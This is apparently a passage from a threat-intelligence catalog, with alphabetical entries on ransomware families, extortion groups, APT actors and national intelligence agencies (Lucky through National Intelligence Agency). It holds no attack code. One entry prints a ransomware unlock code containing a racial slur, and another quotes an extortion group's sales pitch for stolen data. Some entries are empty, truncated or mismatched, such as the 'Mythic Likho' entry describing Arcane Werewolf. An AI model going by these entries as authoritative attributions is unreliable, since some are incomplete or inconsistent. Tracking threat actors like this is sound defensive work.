A series of attacks, targeting both Indian military research and South Asian shipping organizations, demonstrate the minimum level of effort required to successfully compromise a target and steal sensitive information. The attackers use very simple malware, which required little development time or skill, in conjunction with freely available web hosting, to implement a highly effective attack. It is a case of the attackers obtaining a maximum return on their investment. The attack shows how an intelligent attacker does not need to be particularly technically skilled in order to steal the information they are after. The attack begins, as is often the case, with an email sent to the victim. A malicious document is attached to the email, which, when loaded, activates the malware. The attackers use tailored emails to encourage the victim to open the email. For example, one email sent to an academic claimed to be a call for papers (CFP) for a conference. The vast majority of the victims were based in India, with some in Malaysia. The victim industry was mostly military research, and also shipping based in the Arabian and South China seas. In some instances the attackers appeared to have a clear goal, whereby specific files were retrieved from certain compromised computers. In other cases, the attackers used more of a ‘shotgun’-like approach, copying every file from a computer. Military technologies were obviously the focus of one particular attack, in which what appeared to be source code was stolen. 45 different attacker IP addresses were observed. Out of those, 43 were within the same IP address range based in Sichuan province, China. The remaining two were based in South Korea. The pattern of attacker connections implies that the IP addresses are being used as a VPN, probably in an attempt to render the attackers anonymous.

The attacks have been active from at least April 2011 up to February 2012. The attackers are intelligent and focused, employing the minimum amount of work necessary for the maximum gain. They do not use zero-day exploits or complicated threats; instead they rely on effective social engineering and lax security measures on the part of the victims.

Lucky Ransomware

Michael Gillespie discovered a new ransomware that renamed encrypted files to "[[email]][original].[random].lucky" and drops a ransom note named _How_To_Decrypt_My_File_.txt.

LuckyJoe

ransomware

Lucy

ransomware

LulzIntel

The threat actor lulzintel has claimed responsibility for multiple data breaches, including those of vegehome.pl, Almaex, Smaregi, and Kin Teck Tong, exposing sensitive information of over 400,000 individuals combined. The breaches involved the release of customer and patient records, including personal details and medical histories. Sample data has been provided to demonstrate the validity of the claims.

LulzSec Black

LulzSec Black is a hacktivist group that has claimed responsibility for coordinated DDoS attacks against Cyprus' government and critical infrastructure in response to the country's support for Israel. They have also announced cyberattacks targeting the UAE, including breaches of a government website and Alfa Electronics, asserting these actions are in support of Palestine. The group has indicated intentions for further attacks and has not provided independently verifiable evidence of their claims. Their operations reflect a focus on disrupting services and compromising data as part of their political agenda.

Lulzsec Muslims

Lulzsec Muslims is an active extortion or ransomware group tracked by RansomLook.

Luna Moth

Luna Moth conducts high-tempo callback phishing campaigns targeting legal and financial organizations in the U.S., using social engineering to lure victims into calling fake helpdesk numbers. Attackers impersonate IT staff to install legitimate RMM tools, enabling direct access to victim systems for data exfiltration. The group demands ransoms between $1 million and $8 million, threatening to leak stolen data if payments are not made. Their operations reflect a shift from traditional ransomware tactics to data breach extortion, leveraging trusted systems to evade detection.

Luna Ransomware

Ransomware

Luna Tempest

Microsoft threat actor profile. Origin/Threat: Financially motivated.

Lunalock

Lunalock is an active extortion or ransomware group tracked by RansomLook.

LUNAR SPIDER

According to CrowdStrike, this actor is using BokBot/IcedID, potentially buying distribution through Emotet infections. On March 17, 2019, CrowdStrike Intelligence observed the use of a new BokBot (developed and operated by LUNAR SPIDER) proxy module in conjunction with TrickBot (developed and operated by WIZARD SPIDER), which may provide WIZARD SPIDER with additional tools to steal sensitive information and conduct fraudulent wire transfers. This activity also provides further evidence to support the existence of a flourishing relationship between these two actors. Lunar Spider is reportedly associated with Grim Spider and Wizard Spider.

luoxk

Luoxk is a malware campaign targeting web servers throughout Asia, Europe and North America.

Luxnut

ransomware

Lv

LYCEUM

Lyceum is an Iranian APT group that has been active since at least 2014. They primarily target Middle Eastern governments and organizations in the energy and telecommunications sectors. Lyceum is known for using cyber espionage techniques and has been linked to other Iranian threat groups such as APT34. They have developed and deployed malware families like Shark and Milan, and have been observed using DNS tunneling and HTTP for command and control communication.

Lynx

Lynx is an active ransomware-as-a-service operation tracked by RansomLook.

Lynxr

Lynxr is an active extortion or ransomware group tracked by RansomLook.

Lyrix

Lyrix is an active extortion or ransomware group tracked by RansomLook.

m3rx

m3rx is an active extortion or ransomware group tracked by RansomLook.

M4N1F3STO Ransomware (FAKE!!!!!)

It targets English-speaking users and can therefore infect victims worldwide. It is spread via email spam, fake updates, malicious attachments and similar vectors. It claims to encrypt all user files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files. FILES DON’T REALLY GET DELETED NOR DO THEY GET ENCRYPTED!!!!!!!

M4N1F3STO

Ransomware. Does not encrypt. Unlock code: suckmydicknigga

Mabahith

Mabahith (GDI) – المباحث العامة

Mabouia

Ransomware. OS X proof-of-concept (PoC) ransomware.

MacAndChess

Ransomware. Based on HiddenTear.

MacRansom

A basic piece of macOS ransomware, offered via a 'malware-as-a-service' model.

Mad Liberator Ransomware Group

mad liberator

Group is also currently known as MADDLL32 and Metatron.

Madafakah

ransomware

MadBit

ransomware

Madi

Kaspersky Lab and Seculert worked together to sinkhole the Madi Command & Control (C&C) servers to monitor the campaign. Kaspersky Lab and Seculert identified more than 800 victims located in Iran, Israel and select countries across the globe connecting to the C&Cs over the past eight months. Statistics from the sinkhole revealed that the victims were primarily business people working on Iranian and Israeli critical infrastructure projects, Israeli financial institutions, Middle Eastern engineering students, and various government agencies communicating in the Middle East. Common applications and websites that were spied on include accounts on Gmail, Hotmail, Yahoo! Mail, ICQ, Skype, Google+, and Facebook. Surveillance is also performed over integrated ERP/CRM systems, business contracts, and financial management systems.

MAFIA Ransomware

The ransomware appears to target users in Korea, and may have been developed with at least knowledge of the Korean language.

MafiaWare Ransomware

It’s directed to English-speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. Ransom is 155$ in bitcoins. The creator of the ransomware is called Mafia. Based on HiddenTear.

MageCart

Digital threat management company RiskIQ tracks the activity of MageCart group and reported their use of web-based card skimmers since 2016.

Magic Kitten

Earliest activity back to November 2008. An established group of cyber attackers based in Iran, who carried on several campaigns in 2013, including a series of attacks targeting political dissidents and those supporting Iranian political opposition.

Magic

Ransomware. Based on EDA2.

Magician

ransomware

MAGNETIC SPIDER

MAGNETIC SPIDER is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Magniber Ransomware

Magniber is a new ransomware being distributed by the Magnitude Exploit Kit that appears to be the successor to the Cerber ransomware. While many aspects of Magniber differ from Cerber, the payment system and the files it encrypts are very similar.

Mailto

Mailto is an active extortion or ransomware group tracked by RansomLook.

Main Directorate of Special Programs of the President of the Russian Federation

Main Directorate of Special Programs of the President of the Russian Federation (GUSP) – Главное управление специальных программ Президента Российской Федерации

Makop

ransomware

MaktubLocker

Ransomware

Malabu

ransomware

Malas

Malas is an active extortion or ransomware group tracked by RansomLook.

Malaysian Defence Intelligence Organisation

Malaysian Defence Intelligence Organisation (Military Intelligence)[16]

Malaysian Special Branch

Malaysian Special Branch (Police & Internal Intelligence)[17]

Malek Team

Malek Team is an active extortion or ransomware group tracked by RansomLook.

MalKamak

MalKamak is an Iranian threat actor that has been operating since at least 2018. They have been involved in highly targeted cyber espionage campaigns against global aerospace and telecommunications companies. MalKamak utilizes a sophisticated remote access Trojan called ShellClient, which evades antivirus tools and uses cloud services like Dropbox for command and control.

MALLARD SPIDER

CrowdStrike tracks the operators behind Qbot as MALLARD SPIDER.

Mallox

Mallox is an active extortion or ransomware group tracked by RansomLook.

Malphas

Malphas is an active extortion or ransomware group tracked by RansomLook.

Malsmoke

Malsmoke primarily targets Japanese users through malvertising campaigns that deliver Zloader malware, often leveraging adult content lures and geographic IP information. The group has transitioned from exploit kits, such as Fallout, to social engineering tactics, including fake Java updates, while maintaining a focus on high-traffic adult websites. Their operations are characterized by the use of DGA for C2 server domains and the distribution of payloads via a custom loader, previously relying on Smoke Loader. Connections to past campaigns are evident through similarities in malware masquerading as Java plugins and shared registrar information among domains.

MalwareTech's CTF

ransomware

Mamona

Mamona is an active ransomware-as-a-service operation tracked by RansomLook.

Mana Team

Mana Team is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Mancros+AI4939

ransomware

Manifestus Ransomware

It’s directed to English-speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The hacker demands 0.2 bitcoins. The ransomware poses as a Windows update.

Maoloa

ransomware

Marine Corps Intelligence

Marine Corps Intelligence (MCI)

Mario Esxi

Mario Esxi is an active extortion or ransomware group tracked by RansomLook.

Markopolo

Markopolo is a threat actor known for running scams targeting cryptocurrency users through a fake app called Vortax. They use social media and a dedicated blog to legitimize their malicious activities. Markopolo has been linked to a credential-harvesting operation and is agile in pivoting to new scams when detected. The actor leverages shared hosting and C2 infrastructure for their malicious builds.

Marlboro Ransomware

It’s directed to English-speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. Ransom is .2 bitcoin; however, there is no point in even trying to pay, since the damage is irreversible. Once the ransom is paid, the hacker does not decrypt the files. Another name is DeMarlboro, and it is written in C++. It pretends to encrypt using RSA-2048 and AES-128 (really it’s just XOR).

Marozka

ransomware

MarraCrypt

ransomware

Mars

ransomware

MarsJoke

Ransomware

Massgrave

Massgrave is a hacking group that has developed a method to bypass Microsoft's software licensing for Windows and Office, enabling permanent activation of versions from Windows Vista to Windows 11. They are known for creating effective scripts for software activation, which are distributed through an unofficial repository at massgrave.dev. The group claims their exploit supports volume activation via the Key Management Services model and has gained traction within the piracy scene. Reports indicate that their tools may be used by unauthorized individuals, including Microsoft support agents, raising legal and security concerns.

MasterBuster Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

Matrix

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc…

Matroska

ransomware

Maui ransomware

Maui ransomware stands out because it lacks several key features commonly seen in tooling from RaaS providers, such as an embedded ransom note providing recovery instructions or automated means of transmitting encryption keys to attackers. Instead, Maui is believed to be manually operated: operators specify which files to encrypt when executing it and then exfiltrate the resulting runtime artifacts. Many aspects of Maui ransomware remain unknown, including its usage context.

MauriGo

ransomware

MaxiCrypt

ransomware

Maykolin

ransomware

Maysomware

ransomware

Maze

Maze is a ransomware operation known for being the first to implement double extortion tactics.

Mbc

Mbc is an active extortion or ransomware group tracked by RansomLook.

MBR-ONI

ransomware

MC Ransomware

Supposed joke ransomware; decrypts when running an executable with the string "Minecraft".

Mcafee

Mcafee is an active extortion or ransomware group tracked by RansomLook.

mcrypt2019

mcrypt2019 is an active extortion or ransomware group tracked by RansomLook.

Medusa Ransomware Actors

Medusa is a ransomware operation that reportedly launched in June 2021. In 2023, the group launched a website used to publicize alleged victims. The group appears to be independent of the similarly named "MedusaLocker" operation.[[Bleeping Computer Medusa Ransomware March 12 2023](/references/21fe1d9e-17f1-49e2-b05f-78e9160f5414)] According to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, Medusa actors publicly claimed around 90 victims through September 2023, ranking it ninth out of the 50+ ransomware operations in the dataset. These victims come from a wide variety of industry sectors and localities.[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]

Medusa

Medusa is a long-time presence in the ransomware scene that stepped up its activities in late 2024, pushing past its previous limits.

MedusaLocker Ransomware Actors

MedusaLocker is a ransomware-as-a-service ("RaaS") operation that has been active since September 2019. U.S. cybersecurity authorities indicate that MedusaLocker operators have primarily targeted victims in the healthcare sector, among other unspecified sectors. Initial access for MedusaLocker intrusions originally came via phishing and spam email campaigns, but since 2022 has typically occurred via exploit of vulnerable Remote Desktop Protocol devices.[[HC3 Analyst Note MedusaLocker Ransomware February 2023](/references/49e314d6-5324-41e0-8bee-2b3e08d5e12f)] This object represents behaviors associated with operators of MedusaLocker ransomware. As MedusaLocker is licensed on a RaaS model, affiliates likely do not act as a single cohesive unit, and behaviors observed during particular attacks may vary. Behaviors associated with samples of MedusaLocker ransomware are represented in the "MedusaLocker Ransomware" Software object. **Malpedia (Research)**: https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker

MedusaLocker

Observed as recently as May 2022, MedusaLocker actors predominantly rely on vulnerabilities in Remote Desktop Protocol (RDP) to access victims’ networks. The MedusaLocker actors encrypt the victim's data and leave a ransom note with communication instructions in every folder containing an encrypted file. The note directs victims to provide ransomware payments to a specific Bitcoin wallet address. MedusaLocker appears to operate as a Ransomware-as-a-Service (RaaS) model based on the observed split of ransom payments. Typical RaaS models involve the ransomware developer and various affiliates that deploy the ransomware on victim systems. MedusaLocker ransomware payments appear to be consistently split between the affiliate, who receives 55 to 60 percent of the ransom; and the developer, who receives the remainder.

Meduza

ransomware

MegaCortex

Discovered in May 2019. Dropped through networks compromised by trojans like Emotet or TrickBot. Tools and methods used are similar to LockerGoga.

MegaLocker

ransomware

Megazord

Megazord is an active extortion or ransomware group tracked by RansomLook.

Meister

Ransomware. Targets French victims.

Meow

Meow is an active extortion or ransomware group tracked by RansomLook.

Mercury Ransomware

Extension ".Mercury"; note "!!!READ_IT!!!.txt" with 4 different 64-char hex strings as IDs, 3 of which contain dashes. Possible filemarker, identical across different victims' files.

Merry Christmas

It’s directed to English and Italian speaking users, therefore is able to infect worldwide. Most attacks are on organizations and servers. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. They pose as a Consumer complaint notification that’s coming from Federal Trade Commission from USA, with an attached file called “complaint.pdf”. Written in Delphi by hacker MicrRP.

Mespinoza

Mespinoza ransomware has been in use since at least October 2018. First versions used the common extension ".locked". Since December 2019 a new version has been open-sourced and documented; this new version uses the ".pyza" extension.

MetadataBin

ransomware

Metaencryptor

We are a group of young people who identify themselves as specialists in the field of network security with at least 15 years of experience. This blog and this work are ONLY commercial use, besides not the main one. We have nothing to do with politics, intelligence agencies and the NSB. If you are a hunter of other people's data, then download any files and (or) wait until the time expires for others and the files will be available here. If you have any personal suggestions, we are ready to consider them. Contact us on the "contacts" page. There are a lot of other data, for various reasons, not posted here and we can discuss their sale or transfer under certain conditions. Also, every incident is notified to all possible press in the region and data not intended for sale is transmitted to breached and similar forums. Subscribe to RSS, add to favorites, visit us more often.

Meteoritan

Ransomware

Mew767

ransomware

MI5

Security Service/MI5[33] – Domestic counter terrorism and counter espionage intelligence gathering and analysis.

Midas

This malware, written in C#, is a variant of the Thanos ransomware family that emerged in October 2021 and is obfuscated using SmartAssembly. In 2022, ThreatLabz (Zscaler) analysed an incident in which Midas ransomware was slowly deployed over a two-month period. This ransomware also features its own data leak site as part of its double extortion strategy.

miga

#MakeIsraelGreatAgain

Mijnal

ransomware

Mike NotSTOP

ransomware

Mikoyan

ransomware

Miliphen

Miliphen is an active extortion or ransomware group tracked by RansomLook.

Militärischer Abschirmdienst

Militärischer Abschirmdienst (MAD): Military Counterintelligence Service

Militärischer Nachrichtendienst

Military Intelligence Service - Militärischer Nachrichtendienst (MND)

Military intelligence and reconnaissance (Egypt)

Idarat al-Mukhabarat al-Harbyya wa al-Istitla (OMIR) (Office of Military Intelligence and Reconnaissance)

Military Intelligence Corps (Sri Lanka)

Military Intelligence Corps (Sri Lanka)

Military Intelligence Corps (United States Army)

Military Intelligence Corps (MIC)

Military Intelligence (Czech Republic)

Military Intelligence (Vojenské zpravodajství, VZ)

Military Intelligence Department

Military Intelligence Department

Military Intelligence Directorate (Israel)

Aman (Military intelligence)

Military Intelligence Directorate (Syria)

Military Intelligence Directorate

Military Intelligence (MI)

Military Intelligence (MI)

Military Intelligence (Pakistan)

Military Intelligence (MI)

Military Security Agency (Serbia)

Military Security Agency – Војнобезбедносна агенција (VBA)

Military Service for Security and Intelligence

Military Service for Security and Intelligence (Voena služba za razuznuvanje i bezbednost) (Military Agency) [1]

MilkmanVictory

ransomware

mimic-guram

Mimic v.10 Ransomware-as-a-Service (RaaS). The malware is designed to target various operating systems (Windows, ESXi, NAS, FreeBSD) and features network-wide deployment, file obfuscation, backup destruction, UAC bypass, and multithreaded encryption. The service offers additional tools like NTLM password decryption and call-based extortion. They prohibit attacks on CIS countries and require active participation, with decryption tools available for a fee, currently 800 USD.

MIMIC SPIDER

MIMIC SPIDER is mentioned in two summary reports only

Mimic

Mimic is an active extortion or ransomware group tracked by RansomLook.

MindLost

ransomware

MindSystem

ransomware

Mindware

Mindware is an active extortion or ransomware group tracked by RansomLook.

Mini

ransomware

Ministry for National Security (Turkmenistan)

Ministry for National Security (MNS)

Ministry of Defence (Austria)

Abwehramt (AbwA): Counter-Intelligence Office [2]

Ministry of Finance (India)

Economic Intelligence Council

Ministry of Intelligence (Iran)

Ministry of Intelligence (VAJA)

Ministry of Public Security (China)

Ministry of Public Security (MPS)

Ministry of State Security (China)

Ministry of State Security (MSS)

Ministry of State Security (North Korea)

Ministry of State Security[22]

Minotaur

ransomware

Minteye

Minteye is an active extortion or ransomware group tracked by RansomLook.

Mirage Tiger

Mirage Tiger is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

MIRCOP

Ransomware. Prepends files. Demands 48.48 BTC.

MireWare

Ransomware. Based on HiddenTear.

MirrorFace

MirrorFace is a People's Republic of China (PRC)-aligned cyberespionage actor believed to be a subgroup under the menuPass umbrella based on targeting, tools, and infrastructure overlaps. MirrorFace has been active since at least 2019, at first exclusively targeting Japanese organizations across the media, defense, diplomatic, financial, manufacturing, and academic sectors. Subsequent MirrorFace operations included targets in Central Europe and featured use of LODEINFO, HiddenFace, and UPPERCUT malware. [Kaspersky LODEINFO OCT 2022](https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/) [Kaspersky LODEINFO Part II OCT 2022](https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-ii/107745/) [ESET MirrorFace DEC 2022](https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/) [JPCERT MirrorFace JUL 2024](https://blogs.jpcert.or.jp/en/2024/07/mirrorface-attack-against-japanese-organisations.html) [Trend Micro Earth Kasha NOV 2024](https://www.trendmicro.com/en_us/research/24/k/lodeinfo-campaign-of-earth-kasha.html) [Trend Micro Earth Kasha Updates APR 2025](https://www.trendmicro.com/en_us/research/25/d/earth-kasha-updates-ttps.html)

Mischa

Ransomware. Packaged with Petya (PDFBewerbungsmappe.exe).

MM Locker

Ransomware. Based on EDA2.

MMM

ransomware

MNS CryptoLocker

ransomware

mnt6

mnt6 is an active extortion or ransomware group tracked by RansomLook.

Mobef-JustFun

ransomware

Mobef

Ransomware

Mocha Manakin

Mocha Manakin is a threat actor that employs the paste and run technique for initial access, tricking users into executing scripts that download various payloads, including LummaC2, HijackLoader, and Vidar. This actor is notable for utilizing a bespoke NodeJS-based backdoor named NodeInitRAT, which facilitates persistence and reconnaissance activities while communicating with adversary-controlled servers over HTTP. Mocha Manakin has been linked to Interlock ransomware, and while direct ransomware activity has not been observed, there is moderate confidence that unmitigated activity may lead to such outcomes. The effectiveness of paste and run lures, distributed through methods like phishing and web browser injects, has contributed to the actor's increased scope and scale.

ModifiedElephant

Our research into these intrusions revealed a decade of persistent malicious activity targeting specific groups and individuals that we now attribute to a previously unknown threat actor named ModifiedElephant. This actor has operated for years, evading research attention and detection due to their limited scope of operations, the mundane nature of their tools, and their regionally-specific targeting. ModifiedElephant is still active at the time of writing.

Mogilevich

Mogilevich is a ransomware group known for claiming to breach organizations like Epic Games and Ireland's Department of Foreign Affairs, offering stolen data for sale without providing proof of the attacks. They operate as an extortion group, targeting high-profile victims and demanding payment for the data they claim to have stolen. Despite their claims, security researchers have noted that Mogilevich's tactics and website design suggest they may not be a sophisticated threat actor.

Moisha

Moisha is an active extortion or ransomware group tracked by RansomLook.

Molatori

Molatori is a threat actor group identified by Malwarebytes researchers, known for utilizing malicious ScreenConnect clients hosted on domains like atmolatori.icu and gomolatori.cyou. They employ phishing tactics, masquerading as communications from the Social Security Administration to lure targets into installing the client. Once installed, the ScreenConnect client allows the actors to remotely access the victim's computer, facilitating the exfiltration of sensitive information such as banking details and personal identification numbers. The primary objective of the Molatori group is financial fraud, leveraging the stolen data for identity theft and other malicious activities.

MoneroPay

ransomware

Money Message

Money Message is an active extortion or ransomware group tracked by RansomLook.

MoneyTaker

In less than two years, this group has conducted over 20 successful attacks on financial institutions and legal firms in the USA, UK and Russia. The group has primarily been targeting card processing systems, including the AWS CBR (Russian Interbank System) and purportedly SWIFT (US). Given the wide usage of STAR in LATAM, financial institutions in LATAM could have particular exposure to a potential interest from the MoneyTaker group.

Mongo Lock

An attack called Mongo Lock is targeting remotely accessible and unprotected MongoDB databases, wiping them, and then demanding a ransom in order to get the contents back. While this new campaign is using a name to identify itself, these types of attacks are not new and MongoDB databases have been targeted for a while now. These hijacks work by attackers scanning the Internet or using services such as Shodan.io to search for unprotected MongoDB servers. Once connected, the attackers may export the databases, delete them, and then create a ransom note explaining how to get the databases back.

Monolock

Monolock is an active extortion or ransomware group tracked by RansomLook.

Monte

Monte is an active extortion or ransomware group tracked by RansomLook.

Monti

Monti is an active extortion or ransomware group tracked by RansomLook.

MONTY SPIDER

Spambots continued to decline in 2019, with MONTY SPIDER’s CraP2P spambot falling silent in April.

Monument

Ransomware. Uses the DarkLocker 5 porn screenlocker; Jigsaw variant.

MoonCryptor

ransomware

Mora_001

Mora_001 is a threat actor exhibiting a distinct operational signature that combines opportunistic attacks with ties to the LockBit ecosystem. The actor has been observed exploiting CVE-2024-55591 and CVE-2025-24472 vulnerabilities affecting Fortinet devices. The ransom note associated with Mora_001 includes the same TOX ID used by LockBit, indicating a potential affiliation or shared communication channels. Their post-exploitation patterns suggest a structured playbook that differentiates them from other ransomware operators, including LockBit affiliates.

Mordor

ransomware

MORH4x

MORH4x is a self-proclaimed Moroccan hacking group that claimed responsibility for a data leak from Algeria's pharmaceutical industry ministry. The group announced the breach on the BreachForums website, stating that the leaked files span from 2019 to 2025 and include internal documents related to Algeria's pharmaceutical imports. This incident is part of a series of escalating cyberattacks between Moroccan and Algerian hacking groups.

Morpheus

Morpheus is an active extortion or ransomware group tracked by RansomLook.

MorrisBatchCrypt

ransomware

Mortalkombat

Mortalkombat is an active extortion or ransomware group tracked by RansomLook.

Moshen Dragon

Moshen Dragon is a Chinese-aligned cyberespionage threat actor operating in Central Asia. They have been observed deploying multiple malware triads and utilizing DLL search order hijacking to sideload ShadowPad and PlugX variants. The threat actor also employs various tools, including an LSA notification package and a passive backdoor known as GUNTERS. Their activities involve targeting the telecommunication sector and leveraging Impacket for lateral movement and data exfiltration.

Moskalvzapoe

Moskalvzapoe is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Mossad

Mossad (Foreign Intelligence and Special Operations)

MOTD Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

Moth

ransomware

Mount Locker

Ransomware

Mountlocket

ransomware

MoWare H.F.D

ransomware

Mr.Dec

Mr. Dec ransomware is a cryptovirus that was first spotted in mid-May 2018 and has been updated multiple times since. The ransomware encrypts all personal data on the device using the AES encryption algorithm and appends a .[ID]random 16 characters[ID] file extension, preventing further use of the files.

Mr.Locker

ransomware

Mr_Rot13

Mr_Rot13 is a stable hacking group identified through a PHP backdoor and a Downloader domain linked to a C2 infrastructure active since 2020. They utilize the Rot13 algorithm for obfuscation and have demonstrated a low detection rate across security products, indicating advanced operational security. Their activities include exploiting CVE-2026-41940 to deliver malicious payloads and maintaining covert communication via Telegram. The group has shown a particular focus on WordPress as a target, with ongoing operations that suggest a sophisticated threat actor rather than opportunistic attackers.

Mr403Forbidden

ransomware

ms13 089

ms13 089 is an active extortion or ransomware group tracked by RansomLook.

MSN CryptoLocker Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 0.2 bitcoins.

MuchLove

ransomware

Muhstik

ransomware

Muliaka

Muliaka is an active extortion or ransomware group tracked by RansomLook.

MUMMY SPIDER

MUMMY SPIDER is a criminal entity linked to the core development of the malware most commonly known as Emotet or Geodo. First observed in mid-2014, this malware shared code with the Bugat (aka Feodo) banking Trojan. However, MUMMY SPIDER swiftly developed the malware’s capabilities to include an RSA key exchange for command and control (C2) communication and a modular architecture. MUMMY SPIDER does not follow typical criminal behavioral patterns. In particular, MUMMY SPIDER usually conducts attacks for a few months before ceasing operations for a period of between three and 12 months, before returning with a new variant or version. After a 10 month hiatus, MUMMY SPIDER returned Emotet to operation in December 2016 but the latest variant is not deploying a banking Trojan module with web injects, it is currently acting as a ‘loader’ delivering other malware packages. The primary modules perform reconnaissance on victim machines, drop freeware tools for credential collection from web browsers and mail clients and a spam plugin for self-propagation. The malware is also issuing commands to download and execute other malware families such as the banking Trojans Dridex and Qakbot. MUMMY SPIDER advertised Emotet on underground forums until 2015, at which time it became private. Therefore, it is highly likely that Emotet is operate

MurenShark

MurenShark is an advanced persistent threat group that operates primarily in the Middle East, with a focus on targeting Turkey. They have shown interest in military projects, as well as research institutes and universities. This group is highly skilled in counter-analysis and reverse traceability, using sophisticated tactics to avoid detection. They utilize compromised websites as file servers and command and control servers, and have been known to use attack tools like NiceRender for phishing purposes.

MVP Ransomware

Siri discovered a new ransomware that is appending the .mvp extension to encrypted files.

MXX

ransomware

Mydata

Mydata is an active extortion or ransomware group tracked by RansomLook.

Mydecryptor

Mydecryptor is an active extortion or ransomware group tracked by RansomLook.

Mystic

ransomware

Mythic Likho

Arcane Werewolf has been observed targeting Russian manufacturing enterprises through phishing emails that lead to malicious links and spoofed websites. The actor has utilized ZIP archives containing malicious LNK files and a C++ dropper in their campaigns. Their infrastructure includes a C2 server disguised as a Russian manufacturing company website. Kaspersky researchers have noted their evolving TTPs, indicating either a new group or one that has significantly improved its methods.

MZP

ransomware

N-Splitter

Ransomware. Russian Koolova variant.

n1n1n1

Ransomware. Filemarker: "333333333333".

N2019cov

ransomware

n3tworm

n3tworm is an active extortion or ransomware group tracked by RansomLook.

N4ughtysecTU

In March 2022, a hacking group calling themselves N4ughtySecTU claimed to have breached TransUnion’s systems and threatened to leak four terabytes of data if the credit bureau didn’t pay a $15-million (R242-million) ransom.

Naampa

ransomware

Naga

Naga is an active extortion or ransomware group tracked by RansomLook.

Nagini Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Looks for C:\Temp\voldemort.horcrux

Nam3L3ss

Nam3L3ss is a threat actor who has leaked data from 25 companies, including over 2.8 million lines of Amazon employee data, which was confirmed to be stolen from a third-party service provider. The actor is distributing this data on BreachForums and claims to have numerous unreleased datasets.

Namaste

ransomware

Namibia Central Intelligence Service

Namibia Central Intelligence Service (NCIS)

NanoLocker

Ransomware. No extension change; has a GUI.

NARWHAL SPIDER

NARWHAL SPIDER’s operation of Cutwail v2 was limited to country-specific spam campaigns, although late in 2019 there appeared to be an effort to expand by bringing in INDRIK SPIDER as a customer.

NAS Data Compromiser

ransomware

Nasir Security

Nasir Security is an active extortion or ransomware group tracked by RansomLook.

Nasjonal sikkerhetsmyndighet

Nasjonal sikkerhetsmyndighet (NSM) (National Security Authority)

National Accountability Bureau

National Accountability Bureau (NAB)

National Anti-Narcotics Agency (Indonesia)

National Narcotics Agency Intelligence Section – Seksi Intelijen Badan Narkotika Nasional

National Assessments Bureau

National Assessments Bureau[20]

National Ballistics Intelligence Service

National Ballistics Intelligence Service (NBIS)[35] – Illegal firearms intelligence analysis.

National Board of Revenue

Central Intelligence Unit (CIU)

National Bureau of Investigation (Philippines)

National Bureau of Investigation (NBI) – Pambansang Kawanihan ng Pagsisiyasat

National Centre for Counter Terrorism

National Centre for Counter Terrorism (CNRLT, Coordination nationale du renseignement et de la lutte contre le terrorisme)

National Committee for Intelligence Coordination

National Committee for Intelligence Coordination

National Coordinator for Counterterrorism and Security

National Coordinator for Counterterrorism and Security - Nationaal Coördinator Terrorismebestrijding en Veiligheid (NCTV)

National Counter Terrorism Authority

National Counter Terrorism Authority (NACTA)

National Crime Agency

National Crime Agency (NCA)[40] – Organised crime intelligence gathering and analysis. Agency utilizes Unexplained wealth orders and the Investigatory Powers Act 2016.[41][42] NCA officers are posted overseas in around 50 countries.[43] They operate the UK Protected Persons Service, which includes witness protection.[44]

National Crime Intelligence Agency (NCIA)

National Crime Intelligence Agency (NCIA)

National Crises Management Cell

National Crises Management Cell (NCMC)

National Cryptologic Center

National Cryptologic Center - (Centro Criptológico Nacional) (CCN)

National Cyber and Crypto Agency

National Cyber and Crypto Agency (BSSN) – Badan Siber dan Sandi Negara

National Defence Radio Establishment

National Defence Radio Establishment – Försvarets Radioanstalt (FRA)

National Directorate of Information and Intelligence - Dirección Nacional de Información e Inteligencia (DNII)

National Directorate of Information and Intelligence - Dirección Nacional de Información e Inteligencia (DNII)

National Directorate of Intelligence (Peru)

National Directorate of Intelligence - Dirección Nacional de Inteligencia (DINI)

National Domestic Extremism and Disorder Intelligence Unit

National Domestic Extremism and Disorder Intelligence Unit (NDEDIU)[34] – Domestic counter extremism and public disorder intelligence gathering and analysis.

National Economic Crime Bureau

Financial Intelligence Unit (FIU)

National Fraud Intelligence Bureau

National Fraud Intelligence Bureau (NFIB)[36] – Economic crime intelligence gathering and analysis.

National Geospatial-Intelligence Agency

National Geospatial-Intelligence Agency (NGA)

National Intelligence Agency (Democratic Republic of the Congo)

National Intelligence Agency (ANR)

National Intelligence Agency (Nigeria)

National Intelligence Agency (Foreign Intelligence and Counterintelligence)

